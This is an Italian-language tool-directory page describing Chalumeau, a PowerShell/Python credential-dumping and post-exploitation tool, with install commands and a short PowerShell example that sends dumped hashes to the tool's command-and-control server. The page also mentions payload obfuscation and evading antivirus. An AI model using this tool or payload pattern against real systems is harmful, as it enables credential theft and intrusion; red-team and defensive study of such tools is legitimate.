Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/cyberstruggle/chalumeau
Attacchi alle PasswordPost-ExploitPenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHubcyberstruggle/chalumeau

chalumeau

Chalumeau è uno strumento di credential dumping automatizzato,estendibile e personalizzabile basato su powershell e python.

Vedi Repository
102196 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi


Chalumeau

Chalumeau è uno strumento automatico, estendibile e personalizzabile per il dump di credenziali basato su PowerShell e Python.

Funzionalità principali

  • Scrivi i tuoi payload
  • Esecuzione in memoria
  • Estrai elenco di password
  • Report dashboard / Interfaccia web
  • Parsing di Mimikatz
  • Dump dei ticket

Schermate


Problemi noti

  • Parsing di Mimikatz dcsync (in lavorazione per la correzione)
  • Bypass di Antivirus ed EDR, dovrai mantenere i tuoi payload

Da fare

  • Comunicazione crittografata
  • Movimento laterale automatizzato
  • Password spraying automatizzato
  • Cracking di hash automatizzato

Utilizzo

root@kitploit:~
git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh

# Run
chmod +x start.sh

sudo ./start.sh

Scrivi il tuo payload

offusca il tuo payload PowerShell per il dump delle credenziali e usa la chiamata alle funzioni di Chalumeau senza alcun import. Chalumeau crittograferà e contatterà il C2 e invierà le credenziali scaricate. salva semplicemente il file in chalumeau-power/payloads

  • Usando la funzione ChalumeauSendCredentials
    • Secret = l'hash dump o password in chiaro (stringa)
    • Username = il nome utente o id della credenziale dumpata (stringa)
    • IsClearText = 1 se è in chiaro, 0 altrimenti (int)
    • Source = menziona il payload sorgente come "Mimikatz Hash" (stringa)
root@kitploit:~
# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
    ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source "My custom payload"
} 

Crediti

  • wazehell Autore
  • Invoke-Obfuscation Daniel Bohannon
  • Invoke-Mimikatz PowerSploit
  • Get-PassHashes nishang
  • Chalumeau Logo Aureliano
  • Invoke-MassMimikatz PowerTools
Scarica lo strumento